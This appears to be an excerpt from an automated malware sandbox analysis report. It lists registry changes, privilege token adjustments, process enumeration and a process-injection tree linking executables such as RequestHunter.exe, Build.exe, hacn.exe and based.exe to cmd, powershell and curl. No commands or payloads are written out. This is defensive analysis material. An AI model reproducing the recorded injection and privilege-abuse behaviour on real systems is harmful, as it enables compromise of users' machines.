Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7EFE0617-D683-4C35-884A-21AB35BE4EA0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716395529"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe

Modifies registry class 64 IoCs

Processes:

Explorer.EXERuntimeBroker.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe1100000009c6e09240a1da01724660664ca1da01b0f3857465acda0114000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f463a5c000000000000000000000000000000000000000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "6"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

8924 reg.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

vlc.exe

pid process

7296 vlc.exe

pid	process
8924	reg.exe

pid	process
7296	vlc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemain.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdate.exe

pid	process
636	powershell.exe
636	powershell.exe
4992	powershell.exe
4992	powershell.exe
1020	powershell.exe
1020	powershell.exe
3948	powershell.exe
3948	powershell.exe
636	powershell.exe
636	powershell.exe
4992	powershell.exe
4992	powershell.exe
2332	powershell.exe
2332	powershell.exe
3948	powershell.exe
1020	powershell.exe
1020	powershell.exe
2332	powershell.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
3356	main.exe
6820	powershell.exe
6820	powershell.exe
6820	powershell.exe
5456	powershell.exe
5456	powershell.exe
5456	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
8140	powershell.exe
8140	powershell.exe
8140	powershell.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe
7692	Update.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

Explorer.EXEvlc.exe

pid process

3420 Explorer.EXE
7296 vlc.exe

pid	process
3420	Explorer.EXE
7296	vlc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exetasklist.exemain.exepowershell.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2200	tasklist.exe
Token: SeDebugPrivilege	4692	tasklist.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeIncreaseQuotaPrivilege	2968	WMIC.exe
Token: SeSecurityPrivilege	2968	WMIC.exe
Token: SeTakeOwnershipPrivilege	2968	WMIC.exe
Token: SeLoadDriverPrivilege	2968	WMIC.exe
Token: SeSystemProfilePrivilege	2968	WMIC.exe
Token: SeSystemtimePrivilege	2968	WMIC.exe
Token: SeProfSingleProcessPrivilege	2968	WMIC.exe
Token: SeIncBasePriorityPrivilege	2968	WMIC.exe
Token: SeCreatePagefilePrivilege	2968	WMIC.exe
Token: SeBackupPrivilege	2968	WMIC.exe
Token: SeRestorePrivilege	2968	WMIC.exe
Token: SeShutdownPrivilege	2968	WMIC.exe
Token: SeDebugPrivilege	2968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2968	WMIC.exe
Token: SeRemoteShutdownPrivilege	2968	WMIC.exe
Token: SeUndockPrivilege	2968	WMIC.exe
Token: SeManageVolumePrivilege	2968	WMIC.exe
Token: 33	2968	WMIC.exe
Token: 34	2968	WMIC.exe
Token: 35	2968	WMIC.exe
Token: 36	2968	WMIC.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	4376	tasklist.exe
Token: SeDebugPrivilege	3356	main.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeIncreaseQuotaPrivilege	2968	WMIC.exe
Token: SeSecurityPrivilege	2968	WMIC.exe
Token: SeTakeOwnershipPrivilege	2968	WMIC.exe
Token: SeLoadDriverPrivilege	2968	WMIC.exe
Token: SeSystemProfilePrivilege	2968	WMIC.exe
Token: SeSystemtimePrivilege	2968	WMIC.exe
Token: SeProfSingleProcessPrivilege	2968	WMIC.exe
Token: SeIncBasePriorityPrivilege	2968	WMIC.exe
Token: SeCreatePagefilePrivilege	2968	WMIC.exe
Token: SeBackupPrivilege	2968	WMIC.exe
Token: SeRestorePrivilege	2968	WMIC.exe
Token: SeShutdownPrivilege	2968	WMIC.exe
Token: SeDebugPrivilege	2968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2968	WMIC.exe
Token: SeRemoteShutdownPrivilege	2968	WMIC.exe
Token: SeUndockPrivilege	2968	WMIC.exe
Token: SeManageVolumePrivilege	2968	WMIC.exe
Token: 33	2968	WMIC.exe
Token: 34	2968	WMIC.exe
Token: 35	2968	WMIC.exe
Token: 36	2968	WMIC.exe
Token: SeDebugPrivilege	6820	powershell.exe
Token: SeDebugPrivilege	5456	powershell.exe
Token: SeIncreaseQuotaPrivilege	6032	WMIC.exe
Token: SeSecurityPrivilege	6032	WMIC.exe
Token: SeTakeOwnershipPrivilege	6032	WMIC.exe
Token: SeLoadDriverPrivilege	6032	WMIC.exe
Token: SeSystemProfilePrivilege	6032	WMIC.exe
Token: SeSystemtimePrivilege	6032	WMIC.exe
Token: SeProfSingleProcessPrivilege	6032	WMIC.exe
Token: SeIncBasePriorityPrivilege	6032	WMIC.exe
Token: SeCreatePagefilePrivilege	6032	WMIC.exe
Token: SeBackupPrivilege	6032	WMIC.exe
Token: SeRestorePrivilege	6032	WMIC.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

Explorer.EXEvlc.exe

pid process

3420 Explorer.EXE
7296 vlc.exe
3420 Explorer.EXE
3420 Explorer.EXE
7296 vlc.exe
7296 vlc.exe
7296 vlc.exe
3420 Explorer.EXE
3420 Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

vlc.exeExplorer.EXE

pid process

7296 vlc.exe
7296 vlc.exe
7296 vlc.exe
3420 Explorer.EXE
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

Update.exeExplorer.EXEvlc.exe

pid process

7692 Update.exe
3420 Explorer.EXE
3420 Explorer.EXE
3420 Explorer.EXE
3420 Explorer.EXE
3420 Explorer.EXE
7296 vlc.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

RuntimeBroker.exe

pid process

4112 RuntimeBroker.exe

pid	process
3420	Explorer.EXE
7296	vlc.exe
3420	Explorer.EXE
3420	Explorer.EXE
7296	vlc.exe
7296	vlc.exe
7296	vlc.exe
3420	Explorer.EXE
3420	Explorer.EXE

pid	process
7296	vlc.exe
7296	vlc.exe
7296	vlc.exe
3420	Explorer.EXE

pid	process
7692	Update.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
7296	vlc.exe

pid	process
4112	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

RequestHunter.exeRequestHunter.exeRequestHunter.exeRun.exespotify.exespotify.exesvchost.execmd.exesvchost.execmd.execmd.execmd.exeBuild.execmd.exebased.exehacn.exehacn.execmd.execmd.exebased.exe

description	pid	process	target process
PID 2828 wrote to memory of 3200	2828	RequestHunter.exe	Run.exe
PID 2828 wrote to memory of 3200	2828	RequestHunter.exe	Run.exe
PID 2828 wrote to memory of 3052	2828	RequestHunter.exe	RequestHunter.exe
PID 2828 wrote to memory of 3052	2828	RequestHunter.exe	RequestHunter.exe
PID 3052 wrote to memory of 5092	3052	RequestHunter.exe	RequestHunter.exe
PID 3052 wrote to memory of 5092	3052	RequestHunter.exe	RequestHunter.exe
PID 5092 wrote to memory of 1856	5092	RequestHunter.exe	cmd.exe
PID 5092 wrote to memory of 1856	5092	RequestHunter.exe	cmd.exe
PID 5092 wrote to memory of 4552	5092	RequestHunter.exe	cmd.exe
PID 5092 wrote to memory of 4552	5092	RequestHunter.exe	cmd.exe
PID 3200 wrote to memory of 3372	3200	Run.exe	cmd.exe
PID 3200 wrote to memory of 3372	3200	Run.exe	cmd.exe
PID 3372 wrote to memory of 2288	3372	spotify.exe	spotify.exe
PID 3372 wrote to memory of 2288	3372	spotify.exe	spotify.exe
PID 3200 wrote to memory of 1948	3200	Run.exe	svchost.exe
PID 3200 wrote to memory of 1948	3200	Run.exe	svchost.exe
PID 2288 wrote to memory of 4404	2288	spotify.exe	Conhost.exe
PID 2288 wrote to memory of 4404	2288	spotify.exe	Conhost.exe
PID 1948 wrote to memory of 2340	1948	svchost.exe	svchost.exe
PID 1948 wrote to memory of 2340	1948	svchost.exe	svchost.exe
PID 4404 wrote to memory of 1416	4404	cmd.exe	Build.exe
PID 4404 wrote to memory of 1416	4404	cmd.exe	Build.exe
PID 4404 wrote to memory of 1416	4404	cmd.exe	Build.exe
PID 2340 wrote to memory of 1020	2340	svchost.exe	powershell.exe
PID 2340 wrote to memory of 1020	2340	svchost.exe	powershell.exe
PID 1020 wrote to memory of 1176	1020	cmd.exe	curl.exe
PID 1020 wrote to memory of 1176	1020	cmd.exe	curl.exe
PID 2340 wrote to memory of 1468	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 1468	2340	svchost.exe	cmd.exe
PID 1468 wrote to memory of 2520	1468	cmd.exe	cmd.exe
PID 1468 wrote to memory of 2520	1468	cmd.exe	cmd.exe
PID 2340 wrote to memory of 1172	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 1172	2340	svchost.exe	cmd.exe
PID 1172 wrote to memory of 4584	1172	cmd.exe	curl.exe
PID 1172 wrote to memory of 4584	1172	cmd.exe	curl.exe
PID 1416 wrote to memory of 708	1416	Build.exe	hacn.exe
PID 1416 wrote to memory of 708	1416	Build.exe	hacn.exe
PID 2340 wrote to memory of 4880	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 4880	2340	svchost.exe	cmd.exe
PID 4880 wrote to memory of 2304	4880	cmd.exe	curl.exe
PID 4880 wrote to memory of 2304	4880	cmd.exe	curl.exe
PID 1416 wrote to memory of 4036	1416	Build.exe	based.exe
PID 1416 wrote to memory of 4036	1416	Build.exe	based.exe
PID 4036 wrote to memory of 3076	4036	based.exe	based.exe
PID 4036 wrote to memory of 3076	4036	based.exe	based.exe
PID 708 wrote to memory of 4640	708	hacn.exe	hacn.exe
PID 708 wrote to memory of 4640	708	hacn.exe	hacn.exe
PID 4640 wrote to memory of 4604	4640	hacn.exe	cmd.exe
PID 4640 wrote to memory of 4604	4640	hacn.exe	cmd.exe
